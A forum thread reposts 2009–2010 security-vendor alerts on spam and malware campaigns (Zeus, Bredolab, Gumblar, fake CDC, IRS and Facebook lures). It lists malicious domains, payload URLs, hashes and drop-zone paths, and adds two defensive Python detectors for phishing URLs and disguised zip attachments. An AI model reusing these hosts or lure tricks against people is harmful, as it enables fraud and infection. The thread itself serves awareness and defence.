December 1, 2009 - "... the Zeus bot crew... latest offering comes in the guise of an email purporting to come from the CDC (Center for Disease Control). The email contains a link to a bogus Web page that is made to look like an official CDC page... The content of the page asks you to create a profile that will then enable you to get the H1N1 flu vaccine... The subject lines used in the emails are quite variable; for example, the following have been seen:
• Instructions on creation of your personal Vaccination Profile
• Governmental registration program on the H1N1 vaccination
• Your personal Vaccination Profile
The domain used in these email links has the format of online.cdc.gov.[RANDOM CHARS].[TLD NAME].im
For example:
• online.cdc.gov.yhnbad.com.im
• online.cdc.gov.yttt4r.org.im
• online.cdc.gov.yhnbam.co.im
As is usually the case with these campaigns, the URL that is supposed to be a document actually leads to an executable file. This one is named vacc_profile.exe* and is detected by Symantec as Infostealer.Banker.C. Incidentally, the URL is also “personalized” with the email address of the recipient to make it look that little bit more authentic and less like mass-mailed spam..."
(Screenshots available at the Symantec URL above.)
- http://ddanchev.blogspot.com/2009/12/pushdo-injecting-bogus-swine-flu.html
December 02, 2009
* http://www.virustotal.com/analisis/4f1a5551a5fec27950ad99b6c63d568c7c712577121e6b1aa4cdf1ec7549c227-1259719511
File vacc_profile.exe received on 2009.12.02 02:05:11 (UTC)
Result: 14/41 (34.15%)
- http://www.threatexpert.com/report.aspx?md5=5767b2c6d84d87a47d12da03f4f376ad
1 December 2009
- http://www.us-cert.gov/current/#h1n1_malware_campaign_circulating
December 2, 2009
:fear::mad:
AplusWebMaster
2009-12-10, 21:17
FYI...
Malware - Facebook pwd reset SPAM
- http://isc.sans.org/diary.html?storyid=7729
Last Updated: 2009-12-10 18:09:17 UTC - "... email today purporting to be from Facebook, which of course had an attachment. The file was Facebook_Password_833fd.zip*, which unzipped to be Facebook_Password_833fd.exe. The zip file is in fact a zip file, and the exe is in fact MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit (according to the file command). The subject line is "Facebook Password Reset Confirmation. Customer Support"... Which is an attempt to get you to first open the attachment, unzip the file, and then run the executable content... First set of Virustotal results were 20/41 today at 01:30:12 (UTC) https://www.virustotal.com/analisis/af6abaa7d0a29cdd4cf2680771d6d87e22d190a6a293572910ab89bd0653b322-1260408612 when I ran it again at 17:49:06 (UTC) they were up to 26/41 detection. It is a dropper which subsequently downloads and executes other badness.
Facebook does not send out passwords in attached files. If you have forgotten your password on Facebook reset it here: http://www.facebook.com/reset.php if you cannot login to your account (someone else has taken it over) go to this page: http://www.facebook.com/help.php?topic=login, which also has this advisory on it:
"Fake password reset emails
Some users have received fake password reset emails with attachments that contain viruses. Do not click on these emails or download the attachment. Also, please note that Facebook will -never- send you a new password as an attachment. To learn more visit our Security page:
http://www.facebook.com/security ..."
:mad::mad::mad:
AplusWebMaster
2009-12-12, 23:54
FYI...
Phish for FTP pwd's...
- http://www.symantec.com/connect/blogs/phishing-wave-sniff-ftp-credentials
December 11, 2009 - "... attackers are targeting the FTP credentials of websites. The messages appear to come from various trusted Web hosting providers. So far we have observed that users of over 100 Web hosting providers are being targeted by this attack. The attackers ask users to click on the link provided in the spam message, which will lead the users to open an “FTP access confirmation” page where the FTP credentials of the recipients are stolen. Attackers use a phishing cPanel page to do this (cPanel* is a Web hosting administration tool)... The phishing URL contains a user’s email address and the domain name of a Web hosting service provider. Once FTP credentials are entered and submitted by clicking the “Confirm FTP Access” button, users are directed to their hosting site that is specified in a “service=” tag. Example:
http ://cpanel.[removed]. me.uk/scripts/cpanel-ftp-confirmation.php?session=[removed]&email=[removed]&service=[hosting domain name]
Giving up FTP details may lead to a further loss of confidential data, the hosting of illegal websites (child pornography sites, phishing sites, etc.), and/or delivery of malware to the victim's computer by the attacker..."
* http://www.cpanel.net/
:fear:
Visa targeted by ZBOT phish/SPAM
- http://blog.webroot.com/2009/12/11/visa-targeted-again-by-zbot-phishers/
December 11, 2009 - "... targeting Visa with a fake email alert that leads to a page hosting not only a Trojan-Backdoor-Zbot installer, but that performs a drive-by download as well. This is the second time in less than a month that malware distributors have targeted Visa... we saw a similar scam involving links to bunk Verified By Visa Web pages... malware distributors are using fraudulent transaction warnings as a method to infect users with a keylogger capable of stealing their credit card information when the victim enters it into a shopping Web site, but Visa doesn’t issue these kinds of warnings—the Visa-card-issuing bank warns customers of suspected fraud themselves, and they never do anything with that level of urgency via email... As in earlier iterations of this scam, Zbot isn’t just interested in transaction details or Website logins. Zbot also steals the login credentials for virtually every Windows FTP client application — the tools that Web designers and other website administrators use to upload files to Web sites. FTP logins are far more valuable, because it gives the malware distributors another means to spread their code onto the Web. If you’ve been wondering why so many otherwise legitimate Web sites seem to be getting hacked, and having malicious code uploaded to Web sites belonging to small businesses, private individuals, and others, this is why: Zbot is taking those passwords, and handing them off to people who trade not only in malicious code, but in abusing the good reputations of legitimate Website owners or the people who help manage them.
Don’t be a victim: Don’t follow the link in the message. Don’t download the “statement” on the page. If you see a page that looks like the screen above*, immediately kill your browser and scan your computer for Zbot. The drive-by download component of this scam means you could be infected merely by visiting the page using a vulnerable browser. Most importantly, if you suspect a credit card fraud report email may be real, pick up the telephone and call the number on the back of your card."
* Screenshot available at the Webroot URL above.
M86 Security
- http://www.m86security.com/labs/i/Pushdo-Distrubuting-Malicious-VISA-Statements,trace.1207~.asp
December 14, 2009
:fear::mad::fear:
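The two link patterns quoted above (the online.cdc.gov.[RANDOM CHARS].[TLD NAME].im hostnames in the CDC post, and the cPanel "FTP access confirmation" URL carrying the recipient's email plus a "service=" bounce target) can both be caught with simple URL heuristics. Added example written for this thread, not code from Symantec or the original poster; the watch-list, the redirect-parameter names and the sample URLs (other than the cdc.gov one taken from the post) are assumptions.

```python
"""Flag two phishing-link patterns: a trusted domain buried as a *prefix* of
an attacker-controlled hostname, and harvest pages that embed the victim's
e-mail and a domain-valued bounce parameter in the query string."""
import re
from urllib.parse import urlsplit, parse_qs

# Brand domains the campaign above imitated (assumed watch-list).
WATCHED_DOMAINS = ("cdc.gov",)
# Query keys that name where the victim is sent after submitting the form
# (the post shows "service="; the others are common equivalents, assumed).
REDIRECT_KEYS = ("service", "redirect", "return", "next")

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.I)


def brands_used_as_prefix(host):
    """Watched domains that appear inside `host` as a leading label run while
    the host is NOT actually under that domain.
    'online.cdc.gov.yhnbad.com.im' -> ['cdc.gov'];  'www.cdc.gov' -> []"""
    host = host.lower().rstrip(".")
    hits = []
    for brand in WATCHED_DOMAINS:
        if host == brand or host.endswith("." + brand):
            continue                      # genuinely hosted under the brand
        if ("." + brand + ".") in ("." + host + "."):
            hits.append(brand)
    return hits


def analyze_url(url):
    """Return a list of indicator tags for `url`; an empty list means clean."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    tags = ["brand-as-subdomain:" + b for b in brands_used_as_prefix(host)]
    for key, values in parse_qs(parts.query).items():
        k = key.lower()
        # A recipient address embedded in the link marks it as a personalized
        # mass-mailing rather than a generic site link.
        if any(EMAIL_RE.match(v) for v in values):
            tags.append("email-in-query:" + k)
        # A domain-valued bounce parameter lets the harvest page hand the
        # victim off to the real provider afterwards, masking the theft.
        if k in REDIRECT_KEYS and any(DOMAIN_RE.match(v) for v in values):
            tags.append("redirect-param:" + k)
    return tags


if __name__ == "__main__":
    # Constructed samples modelled on the two posts above (not live URLs).
    samples = [
        "http://online.cdc.gov.yhnbad.com.im/vacc_profile.exe",
        "https://www.cdc.gov/h1n1flu/vaccination/",
        "http://cpanel.redacted-host.example/scripts/cpanel-ftp-confirmation.php"
        "?session=deadbeef&email=victim%40example.com&service=hosting-provider.example",
    ]
    for s in samples:
        print(s, "->", analyze_url(s) or "clean")
```

The prefix check deliberately avoids computing a registrable domain, so it needs no Public Suffix List and still catches "cdc.gov" sitting in front of .com.im, .co.im and similar suffixes.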
AplusWebMaster
2009-12-15, 19:49
FYI...
ZBOT targets Facebook again (with SPAM)
- http://blog.trendmicro.com/zbot-targets-facebook-again/
Dec. 15, 2009 - "ZBOT has currently been spotted engaging in another spam run targeting Facebook yet again. By clicking the link embedded in the email, users will land on a Facebook phishing page. This time, however, the phishing page contains an iframe that points to a Web exploit toolkit. This exploit toolkit can deliver a variety of exploits, depending upon the user’s browser and OS. For users of Firefox, the toolkit will push a .PDF file (detected by Trend Micro as TROJ_PIDIEF.PAL) to exploit a known vulnerability in Collab.getIcon. If the user is not infected via the exploit toolkit, ZBOT is still left with the social engineering aspect. After a user enters credentials into the phishing page, the user is led to a download page of updatetool.exe -or- the ZBOT binary (detected as TSPY_ZBOT.CCB)..."
(Screenshot available at the URL above.)
DHL - SPAM appears to have come from known courier DHL
- http://blog.trendmicro.com/bredolab-regifts-old-spam/
Dec. 15, 2009 - "BREDOLAB set out on a spam rerun just in time for the holidays. This recent run is similar to the laptop delivery note spam run we reported in August. This time, however, the spammed message appears to have come from known courier, DHL. The spammed message makes it appear as though the users have received a notification from DHL, alerting them about an error in shipping a certain package. The message also prompts the users to open an attached file. The attached file DHL_package_label_cfb35.exe is detected as TROJ_BREDOLAB.CB. The dynamics of this spam run, although relatively old and simple, could still pack a punch, especially now that we are well within that part of the holiday season where most people do their gift shopping. People who may have purchased a laptop online and are expecting it to come through the mail are prone to being victimized by this attack..."
(Screenshot available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2009-12-26, 17:27
FYI...
SPAM - Christmas e-cards...
- http://blog.trendmicro.com/christmas-greetings-from-spammers/
Dec. 25, 2009 - "Spammers are clearly putting the holidays to (their) good use, as they have made Christmas just another reason to spread malware. Trend Micro threat analysts recently received a spammed message purporting to come from 123greetings.com, a legitimate site that users can access to send e-cards to family and friends. The email message even sported the site’s logo... However, upon further investigation of the spammed message’s header, we noticed that the sender’s IP address did not match that of the legitimate 123greetings.com site... The spammed message urges the user to download and open the .ZIP file attachment, which is actually an .EXE file detected by Trend Micro as WORM_PROLACO.Z, in order to view the greeting card... To keep your system malware-free this festive season, do -not- open unsolicited email messages..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2009-12-30, 00:27
FYI...
Fox Sports site - injected with malicious code
- http://securitylabs.websense.com/content/Alerts/3516.aspx?
12.29.2009 - Malicious Web Site / Malicious Code - "Websense... has detected that the Fox Sports site has been compromised and injected with malicious code... Our research shows that the site has been injected with two pieces of malicious code. One of them is the latest Gumblar campaign, and the other redirects individuals to a malicious Web site, whose link was unreachable at the time of this alert. The ThreatSeeker Network has detected that thousands of Web sites have been compromised by the latest Gumblar campaign. The Gumblar page is highly obfuscated. After deobfuscation, the page uses PDF and Flash exploits to run malware in order to control a victim's computer. In addition, a piece of VBScript is executed to download malware..."
(Screenshots available at the Websense URL above.)
:fear::mad::fear:
AplusWebMaster
2010-01-02, 07:27
FYI...
New year related malware...
- http://www.f-secure.com/weblog/archives/00001847.html
December 31, 2009 - "The first signs of New Year malware for this year were already sighted a while back, but the current one we're seeing in circulation wishes "Happy New Year 2010" and points to a fast flux domain site which serves up Trojan-Downloader:W32/Agent.MUG. This particular trojan will try to install further malware, though the content it's pointing to seems to not yet be online, at least at the time of this post. Be careful when reading electronic happy New Year's wishes also this year..."
:fear::mad:
AplusWebMaster
2010-01-05, 18:57
FYI...
SCAM spreading on Facebook and SEO...
- http://securitylabs.websense.com/content/Alerts/3518.aspx?
01.05.2010 - "Websense... has discovered several spam messages on Facebook that trick the user into visiting BINSSERVICESONLINE(dot)INFO. When the link in the message is clicked, the Web site -redirects- the user to an online scam site similar to the one we published in the blog Google Scam Kits* in mid-December. The use of Facebook to distribute links that lead to Google scam kits is fairly new, and is sure to trick some users into buying the kits. A lot of users have apparently received this message, as it quickly became a popular search string on Google. As we've seen in the past, there are criminal groups monitoring the popular search terms on Google and other search engines to start their own malicious attacks, so it didn't take long until we started seeing Google search results for BINSSERVICESONLINE leading to rogue AV products. Note that the two attacks are done by separate groups of criminals. One group started the spam attacks on Facebook and another started manipulating Google results..."
* http://securitylabs.websense.com/content/Blogs/3512.aspx
(Screenshots available at the Websense URL above.)
:fear::mad:
AplusWebMaster
2010-01-11, 01:01
FYI...
Outlook Web Access SPAM Campaign...
- http://isc.sans.org/diary.html?storyid=7918
Last Updated: 2010-01-08 21:57:40 UTC ...(Version: 3) - "... an email campaign targeting OWA users that leads to malware infections... When you review the SPAM, notice the link that is displayed shows it is from our.org but the actual hyperlink is to our.org .molendf.co .kr... traced the IP and am blocking it so if others get through the SPAM filter our users will not be able to get to the site... submitted the file to VirusTotal* to see what they found and it is very new..."
* http://www.virustotal.com/analisis/26efaeec869a31abb49fdcc6ef82207f1234f92b73de01589e8294a053f31d7b-1262953493
File settings-file.exe received on 2010.01.08 12:24:53 (UTC)
Result: 16/41 (39.02%)
Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware
- http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html
UPDATED: January 10, 2010
Don't Update Your Email Settings
- http://www.m86security.com/labs/i/Don-t-Update-Your-Email-Settings,trace.1215~.asp
January 10, 2010
:fear::mad:
AplusWebMaster
2010-01-11, 18:19
FYI...
Bogus IRS W-2 form leads to malware
- http://blog.trendmicro.com/bogus-irs-w-2-form-leads-to-malware/
Jan. 11, 2010 - "... spammers now are capitalizing on the upcoming tax season. Recently, Trend Micro threat analysts found spammed messages purporting to come from the Internal Revenue Service (IRS). The spammed message bears the subject, “W-2 Form update,” and informs users to update the said form because of supposed “important changes.” The W-2 form states an employee’s annual salary and total tax. The spammed message looks normal since the URLs and phone numbers in it are legitimate. This was probably done so users will not suspect anything. It also encourages users to open the attached .RTF file (Update.doc), which is supposed to be the W-2 form. When users open the .RTF file, however, they will see an embedded .PDF file. This supposedly PDF file is actually an .EXE file that uses the PDF icon. This is detected by Trend Micro as BKDR_POISON.BQA. BKDR_POISON.BQA is a component of the Darkmoon Remote Administration Tool (RAT), which enables a malicious user to execute commands on the affected system. Interestingly, this backdoor attempts to connect to a private IP address (192.168.29.1). This may be the attacker’s misconfiguration, or an attack targeting a specific internal network environment... Users are strongly advised not to open any suspicious-looking emails even though they came from a supposedly known source. It is also recommended that users verify with IRS if the email they received is legitimate or not..."
(Screenshots available at the TrendMicro URL above.)
- http://www.viruslist.com/en/weblog?weblogid=208188001
January 07, 2010
- http://www.us-cert.gov/current/#irs_warns_of_online_scams
January 13, 2010 - "... The U.S. Internal Revenue Service has issued a news release* on its website warning consumers about potential scams. These scams are circulating via fraudulent email or other online messages appearing to come from the IRS. They attempt to convince consumers to reveal personal and financial information that can be used to gain access to bank accounts, credit cards, and other financial institutions..."
* http://www.irs.gov/newsroom/article/0,,id=217794,00.html
:fear::mad:
AplusWebMaster
2010-01-13, 15:16
FYI...
40 trillion SPAM messages were sent in 2009...
- http://www.symantec.com/connect/blogs/2000-2009-spam-explosion
January 12, 2010
(Interesting 2001-2009 Growth chart available at the URL above.)
:confused: :sad:
AplusWebMaster
2010-01-14, 15:12
FYI...
Banker Scams - SPAM...
- http://blog.trendmicro.com/banker-scams-new-spam-victims/
Jan. 14, 2010 - "Two new spam campaigns spreading variants of the BANKER family of identity-stealing Trojans have recently emerged. The first campaign features spammed messages containing malicious links to supposed pictures. Once clicked, however, users ended up with TSPY_BANKER.OCN infections. This campaign made use of standalone files... The second campaign was more elaborate, as the involved malware (detected as TSPY_BANKER.MTX) had two components - one steals banking-related information while the other steals email account information... Both campaigns may, however, be related, as the information they steal from users ends up in drop zones that are hosted on the same Web server:
* {BLOCKED}unicaobr .com/phps/procopspro .php
* {BLOCKED}unicaobr .com/working/lisinho .php
Looking for more details on webcomunicaobr .com revealed the following details:
IP: 69.162.102.130 Hosted in the USA
ASN: AS46475 LIMESTONENETWORKS Limestone Networks Inc. Primary ASN
ns1 .brasilrevenda .com
ns2 .brasilrevenda .com
Digging a little bit deeper still, three interesting pages cropped up that revealed the number of systems each contracted spammer has infected so far... a list of PHP servers where stolen information is sent... and a list of files that contained encrypted information downloaded by infected hosts..."
(Screenshots available at the TrendMicro URL above.)
:fear::mad:
AplusWebMaster
2010-01-22, 07:17
FYI...
Targeted e-mail examples relating to MS IE 0-day CVE-2010-0249
- http://securitylabs.websense.com/content/Alerts/3536.aspx
01.21.2010 - "Websense... has reports that emails linking to malicious web-based exploit code that utilizes the vulnerability CVE-2010-0249 have been sent to organizations in a targeted manner since December 2009, and the attack is still on-going. This same vulnerability was used to target Google, Adobe, and approximately 30 other companies in mid-December 2009.... Investigation has so far led to the conclusion that these targeted attacks appear to have started during the week of 20 December 2009, and are on-going to government, defence, energy sectors and other organizations in the United States and United Kingdom. Within the malicious emails the sender's domain is spoofed to match the recipient's domain making the targeted emails more convincing to the recipient. The malicious executables that are delivered by the exploit code include hxxp ://cnn[removed]/US/20100119/ update.exe or hxxp ://usnews[removed]/ svchost.exe. These exhibit traits of an information-stealing Trojan with Backdoor capabilities. As of today only 25% of AV vendors protect against the payload according to this VT report*. Example email subjects include:
"Helping You Serve Your Customers"
"Obama Slips in Polls as Crises Dominate First Year as President"
"2010 ***** Commercial SATCOM"
"The Twelve Days of Christmas" ...
* http://www.virustotal.com/analisis/ee6d60ade4f20dd305ab27100623718d0ea8409be524d45e7b375269857fd797-1264090078
File update-exe-.txt received on 2010.01.21 16:07:58 (UTC)
Result: 11/41 (26.83%)
>>> http://forums.spybot.info/showpost.php?p=356653&postcount=110
:fear::fear:
AplusWebMaster
2010-01-25, 14:47
FYI...
40% of a month’s malware - Troj/JSRedir-AK
- http://www.sophos.com/blogs/sophoslabs/v/post/8338
January 25, 2010 - "It has been a month since we added detection for Troj/JSRedir-AK* and figures generated today show that over 40% of all web-based detections have been from this malicious code. Translating the numbers into a more human comprehensible form: 1 site every 15 secs was being detected as Troj/JSRedir-AK. The affected sites include well-known names, including:
• Energy Companies
• Retail Companies
• Automobile Club
• Hotels
...Using the JavaScript .replace the malware deobfuscates itself and dynamically writes an iframe pointing to a Russian website on port 8080 which serves up scripts detected as Troj/Iframe-DL. This new script will write an iframe that will attempt to load a PDF (detected as Troj/PDFJs-FY) and a file claiming to be a JPG (detected as Exp/VidCtl-A). These then will install various other malware. Troj/JSRedir-AK is a continuation of the Gumblar gang’s exploits using Russian domains instead of Chinese ones... very similar to the one we saw for Troj/JSRedir-R and the infection mechanisms seem to be the same (i.e. FTP credentials)."
(Interesting graph available at the URL above.)
* http://www.sophos.com/security/analyses/viruses-and-spyware/trojjsredirak.html
"More Info... Troj/JSRedir-AK will redirect the web browser to other malicious websites."
:fear::mad::fear:
AplusWebMaster
2010-01-26, 21:19
FYI...
Q4 '09 web-based malware data and trends
- http://blog.dasient.com/2010/01/q409-web-based-malware-data-and-trends.html
January 26, 2010 - "... the way malware is being distributed is undergoing a fundamental shift, with more attackers focusing on "drive-by downloads" from legitimate sites that have been compromised, or from sites designed specifically for malicious purposes. In nearly all the variations on this kind of attack, no user action is required for the infection to occur, beyond loading the site in a browser - and there are very few signs that malicious code has been downloaded... Based on the telemetry data we've gathered from the web, we estimate that more than 560,000 sites and approximately 5.5 million pages were infected in Q4'09, compared with more than 640,000 sites and 5.8 million pages in Q3'09. By the end of the year, we had identified more than 100,000 web-based malware infections... we saw a more significant drop in the number of infected sites than we did in the number of infected pages because each infection tended to spread to a larger number of pages on each site... more than four of every 10 sites infected in the quarter were reinfected within a space of three months... the file names most often used in drive-by downloads included things like "setup.exe," "update.exe" (which was used in the Google attack), and "install_flash_player.exe"... In previous years, a drive-by download would often initiate 10 or more extra processes, ostensibly in an attempt to maximize the return from each infected endpoint. In response, the search providers and anti-virus vendors who scan the web for infected sites began using the number of extra processes initiated as a signal that the webpage might be malicious. But in Q4'09, the average number of extra processes initiated was just 2.8 -- enough for a downloader and perhaps one or two pieces of malware. Clearly, attackers are getting smarter about the way they structure their attacks, opting for a smaller fingerprint on an infected machine in exchange for a greater likelihood of evading detection..."
:fear::mad:
AplusWebMaster
2010-01-27, 14:35
FYI...
Death hoax from hacks - actor Johnny Depp
- http://blog.trendmicro.com/hackers-exploit-actor-johnny-depp%E2%80%99s-death-hoax/
Jan. 27, 2010 - "News involving celebrity deaths (real or hoax) have a habit of spreading across the Internet like wildfire, sensationalizing bits of information to entice readers. So, it is easy to see why pranksters and cybercriminals exploit the fact that people love gossip. So when rumors of Johnny Depp’s supposed death due to a car crash broke out, it did not take long before cybercriminals took advantage of the supposed reports to spread malware via their usual blackhat search engine optimization (SEO) tactics... While most hoaxes come in the form of spammed messages, this particular scam involved the creation of several malicious sites where rigged search results led to, which led curious readers to system infections rather than to more information on Depp’s alleged death... Once users click the embedded links, however, they will be redirected to a video entertainment site that claims to host footage of Depp’s accident... Upon playing the supposed video, users will be prompted to download a codec in order to watch it, which is actually a malicious file detected by Trend Micro as TROJ_DLOADER.GRM. When executed, TROJ_DLOADER.GRM connects to a remote site to download a malicious file. It then displays a professional-looking graphical user interface (GUI) promoting a bogus software called DriveCleaner 2006 before opening a window that shows the software—an executable file—installation’s progress... never underestimate the speed at which an Internet hoax spreads. Whether seasoned Web surfer or first timer, it does not matter, it is always advisable to keep your guard up. Cybercriminals want profit. So, the more successful an attack, the more money they make..."
(Screenshots available at the URL above.)
:mad::mad:
AplusWebMaster
2010-01-28, 03:11
FYI...
Top 50 - Badware - by number of reported URLs
- http://stopbadware.org/reports/asn
Daily Change ...
How to interpret this data
- http://stopbadware.org/home/data_interpretation#asn_reports
Sample chart
- http://stopbadware.org/reports/asn/15169
Google Diagnostics
- http://www.google.com/safebrowsing/diagnostic?site=AS:15169
"Of the 723306 site(s) we tested on this network over the past 90 days, 6982 site(s), including, for example, mkdorrjvb.blogspot.com/, denisa8357.blogspot.com/, miriam8998.blogspot.com/, served content that resulted in malicious software being downloaded and installed without user consent..."
:fear::fear:
AplusWebMaster
2010-02-01, 18:58
FYI...
Valentine’s Day SPAM/scams begin...
- http://blog.trendmicro.com/early-hearts-day-presents-from-spammers/
Feb. 1, 2010 - "February has already begun, which means Valentine’s Day is close at hand. As usual, spammers will definitely hype up their malicious activities. It is only the first day of the so-called “love month” but we have already seen at least two SPAM samples leveraging one of the most-celebrated special occasions when people flock to websites that advertise gifts they can give to their loved ones... Every special occasion and/or holiday is, in today’s threat-laden Internet landscape, not just a time for people to celebrate but also a time for spammers to scam unwitting users with their devious scams... Spammed messages come in many forms and with varying payloads, some redirect users to sites that sell anything and everything under the sun, most especially pharmaceutical and replica items; some lead to links to malicious or malware-ridden sites; some lead to sites that advertise bogus promotions; and some carry malware as attachments..."
(Screenshots available at the URL above.)
:sad::fear:
AplusWebMaster
2010-02-02, 01:01
FYI...
Google Job app - malicious response
- http://securitylabs.websense.com/content/Alerts/3543.aspx?cmpid=slalert
2/1/2010 - "Websense... has discovered a new malicious spam campaign that spoofs Google job application responses. The messages look very well written and are so believable that they are probably scrapes from actual Google job application responses. Typically, spam has grammatical errors or spelling mistakes that make the messages obviously unofficial and act as red flags. The text of these messages, however, has no such mistakes, making them much more believable - especially if the target really has applied for a job with Google. The From: address is even spoofed to fool victims into believing the message was sent by Google. The messages have an attached file called CV-20100120-112.zip that contains a malicious payload. This is where the message gets suspicious, because the contents of the .zip file have a double extension ending with .exe. The attackers attempt to hide the .exe extension by preceding it with .html or .pdf, followed by a number of spaces and then the .exe extension. The .exe file (SHA1:80366cde71b84606ce8ecf62b5bd2e459c54942e) has little AV coverage* at the moment..."
* http://www.virustotal.com/analisis/d5fd8e098054a5f1b570de5d31241c1428a79fb25ec6a477261f6efaaf3d7440-1265043648
File document.htm_____________________ received on 2010.02.01 17:00:48 (UTC)
Result: 10/40 (25.00%)
(Screenshot available at the Websense URL above.)
:fear::mad:
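Both .zip lures quoted above (Facebook_Password_833fd.zip, whose member was a PE executable, and CV-20100120-112.zip, whose member hid ".exe" behind ".htm"/".pdf" and a run of spaces) can be triaged before anyone unzips them: list the members, look for padded double extensions and confirm the real type from the leading bytes the way the `file` command does. Added example for this thread, not code from Websense, ISC or the original poster; the archives are built in memory from constructed bytes and the extension lists are assumptions.

```python
"""Attachment triage: inspect .zip members for misleading names and check
their magic bytes, without executing or extracting anything to disk."""
import io
import re
import zipfile

EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")
# "<name>.<decoy ext><two or more spaces>.<executable ext>" at end of name,
# the padding trick described in the Google job-application post.
PADDED_DOUBLE_EXT = re.compile(
    r"\.(html?|pdf|doc|jpe?g|txt)\s{2,}\.(exe|scr|com|pif|bat|cmd)$", re.I)


def sniff_type(head):
    """Minimal magic-byte check in the spirit of file(1)."""
    if head[:2] == b"MZ":
        return "pe-executable"
    if head[:4] == b"%PDF":
        return "pdf"
    if head[:4] == b"PK\x03\x04":
        return "zip"
    return "unknown"


def triage_zip(zip_bytes):
    """Return one finding dict (name, type, reasons) per archive member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            with zf.open(info) as fh:
                head = fh.read(8)          # enough for the magic checks
            lowered = name.lower().rstrip()
            reasons = []
            if lowered.endswith(EXEC_EXT):
                reasons.append("executable-extension")
            if PADDED_DOUBLE_EXT.search(name):
                reasons.append("padded-double-extension")
            kind = sniff_type(head)
            # A PE whose name does not end in an executable extension is
            # relying on the icon or a decoy extension to be opened.
            if kind == "pe-executable" and not lowered.endswith(EXEC_EXT):
                reasons.append("pe-with-misleading-name")
            findings.append({"name": name, "type": kind, "reasons": reasons})
    return findings


def build_sample_zip(member_name, payload):
    """Constructed single-member archive for demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, payload)
    return buf.getvalue()


# Constructed stand-in for a Windows PE: DOS header magic plus filler.
FAKE_PE = b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode"


if __name__ == "__main__":
    for member in ("Facebook_Password_833fd.exe",
                   "document.htm" + " " * 20 + ".exe",
                   "statement.pdf"):
        for f in triage_zip(build_sample_zip(member, FAKE_PE)):
            print(repr(f["name"]), f["type"], f["reasons"])
```

Member names are taken from the central directory exactly as stored, so the run of spaces survives and the regex sees it even though a file manager would render the name truncated.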
AplusWebMaster
2010-02-03, 00:46
FYI...
Twitter mass password reset due to phishing
- http://isc.sans.org/diary.html?storyid=8137
Last Updated: 2010-02-02 21:47:04 UTC - "Twitter is sending out a large number of e-mails, asking users to reset their passwords. It appears a large number of passwords got compromised in a recent phishing incident (mine included). When I received the message at first, I considered the e-mail a phishing attempt in itself. But all the links appeared to be "good". If you receive an e-mail like this, I recommend the following procedure:
1. delete the e-mail
2. go to twitter by entering the link in your browser. Best:
use https://www.twitter.com (httpS not http)...
3. change your password.
4. do not reuse the password, do not use a simple password scheme (like "twitterpassword" and "facebookpassword")
I know it is hard. A lot of people will advise against writing the password down, or using a "password safe" application. But considering the risks, I tend to advise people to rather write down the passwords or use a password safe application compared to using bad / repeating passwords."
Reason #4132 for Changing Your Password
- http://status.twitter.com/post/367671822/reason-4132-for-changing-your-password
Feb. 2, 2010 - "... We strongly suggest that you use different passwords for each service you sign up for; more information on how to keep your Twitter account safe can be found here: http://twitter.zendesk.com/forums/10711/entries/76036 ."
:sad::fear::mad:
AplusWebMaster
2010-02-04, 18:00
FYI...
Q3-Q4 2009 - Malware in more than 1 in 10 Search Results...
- http://preview.tinyurl.com/yadn9uj
Feb 04, 2010 - "The second half of 2009 saw malware authors focus their efforts to ensure they drove victims straight to them. In contrast to the first half of the year where mass injection attacks like Gumblar, Beladen and Nine Ball promoted a sharp rise in the number of malicious Web sites, Websense Security Labs observed a slight (3.3 percent) decline in the growth of the number of Web sites compromised. Instead, attackers replaced their traditional scattergun approach with focused efforts on Web 2.0 properties with higher traffic and multiple pages. Over the six month period, Search Engine Optimization (SEO) poisoning attacks featured heavily, and Websense Security Labs research identified that 13.7 percent of searches for trending news/buzz words lead to malware. In addition, attackers continued to capitalize on Web site reputation and exploiting user trust, with 71 percent of Web sites with malicious code revealed to be legitimate sites that had been compromised... During the second half of 2009 Websense Security Labs discovered:
• 13.7 percent of searches for trending news/buzz words (as defined by Yahoo Buzz & Google Trends) lead to malware
• 95 percent of user-generated comments to blogs, chat rooms and message boards are spam or malicious
• 35 percent of malicious Web attacks included data-stealing code
• 58 percent of data-stealing attacks are conducted over the Web
• 85.8 percent of all emails were spam
• an average growth of 225 percent in malicious Web sites ..."
:fear::mad::sad:
AplusWebMaster
2010-02-07, 23:33
FYI...
Fake Firefox update site pushes adware
- http://www.infosecurity-us.com/blog/2010/2/3/fake-firefox-update-pages-push-adware/126.aspx
03/02/2010 - "Since its release on January 21st, the newest version of the Firefox web browser has received a great deal of attention. In just a short time it has achieved over 30 million downloads. Adware pushers are capitalizing on the success of Firefox, packing ad serving software in with the program in an effort to increase their reach. Purveyors of spyware and adware will try to take advantage of well known programs, illegitimately bundling their software into the install of the popular software. These programs are also commonly referred to as Potentially Unwanted Programs (PUPs) whose content is not necessarily malicious, but is almost never wanted by the user. These types of software are often used to collect information about the user without the users’ knowledge or consent. The latest example is found on the fake Firefox download site... (screenshot at the URL above). The page is cleverly disguised with the appearance of a legitimate Firefox download site and could easily fool many users hoping to upgrade... Taking a closer look reveals clues to the fraudulent page. While the page advertises version 3.5 the newest version is actually 3.6. There are also misspellings such as “Anti-Pishing” in the title of the security section. Victims of this scam install the “Hotbar” toolbar by Pinball Corp, formerly Zango. Not only are users subject to the annoying toolbar, they're also barraged with pop-up ads and host to a new Hotbar weather application running in the system tray... Users looking to upgrade Firefox should go to the real download site at http://getfirefox.com ..."
- http://www.theregister.co.uk/2010/02/03/fake_firefox_download/
3 February 2010
:fear::mad:
AplusWebMaster
2010-02-08, 16:18
FYI...
Gmail phish...
- http://www.f-secure.com/weblog/archives/00001876.html
